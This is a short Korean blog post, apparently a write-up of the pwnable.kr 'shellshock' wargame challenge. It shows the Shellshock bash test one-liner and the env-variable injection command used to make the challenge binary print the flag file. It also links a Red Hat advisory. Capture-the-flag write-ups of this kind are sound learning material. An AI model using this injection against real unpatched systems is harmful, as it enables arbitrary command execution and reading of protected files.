Notice
Recent Posts
Recent Comments
Link
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 |
Tags
- pwnable
- forensic
- rce
- 시스템해킹
- elasticsearch
- Index
- filesystem
- windows
- #C언어 #연산자
- 가이드라인
- exploit
- 백엔드개발자
- sql인젝션
- 랜섬웨어
- SQLMap
- Mitre
- Threat Intelligence
- #whitespace #
- PetitPotam
- Credential Access
- 프론트엔드개발자
- node.js
- software
- wargame
- AD
- ATT&CK
- error 583066
- 침해사고
- elk stack
- 정보보안
Archives
- Today
- Total
Plit00's Story
[Pwnable.kr]-shellshock 본문
shellshock - 1pt문제
shellshock.c 의 내용은 다음과 같다
그후 shellshock 의 취약점은 env x='() { :;}; echo pwnable!' bash -c 'echo safe~' 로 확인 할 수 있다.
env x='() { :;}; /bin/cat flag' ./shellshock 으로 적용하게된다면 원하는 것을 실행 할 수 있게된다.
그후 bash 로딩후 슥삭
취약점 확인방법은
https://access.redhat.com/blogs/766093/posts/1976383 을 참고하기바란다.
'Wargame > Pwnable.kr' 카테고리의 다른 글
[Pwnable.kr] Toddler's Bottle - blukat (0) | 2019.04.15 |
---|---|
[Toddler's Bottle]-unlink (0) | 2018.02.21 |
[Toddler's Bottle]-cmd1 (0) | 2018.02.21 |
[Toddler's Bottle]-blackjack (0) | 2018.02.21 |
Comments